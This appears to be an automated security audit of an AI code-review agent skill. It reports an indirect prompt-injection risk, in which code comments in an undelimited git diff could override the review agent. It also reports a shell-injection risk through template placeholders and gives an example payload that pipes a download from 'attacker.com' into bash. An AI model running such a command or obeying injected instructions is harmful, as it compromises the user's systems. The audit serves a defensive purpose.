requesting-code-review
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFE (findings: PROMPT_INJECTION, COMMAND_EXECUTION)
Full Analysis
- PROMPT_INJECTION (LOW): Indirect Prompt Injection vulnerability surface detected.
  - Ingestion points: Untrusted code is ingested via `git diff` commands in `templates/code-reviewer.md`.
  - Boundary markers: Absent. The code content is directly interpolated into the prompt without delimiters or instructions to ignore embedded commands.
  - Capability inventory: The agent can execute shell commands (`git`) and use a subagent Task tool.
  - Sanitization: None. Malicious instructions within code comments could bias or override the review agent's logic.
- COMMAND_EXECUTION (LOW): Potential shell command injection through template placeholders.
  - Evidence: In `templates/code-reviewer.md`, the placeholders `{BASE_SHA}` and `{HEAD_SHA}` are used directly within a bash code block: `git diff {BASE_SHA}..{HEAD_SHA}`.
  - Risk: If an attacker can influence the value of these placeholders (e.g., via a malicious PR title or description used to populate the fields), they could execute arbitrary shell commands (e.g., `{BASE_SHA}=; curl attacker.com | bash`).
Audit Metadata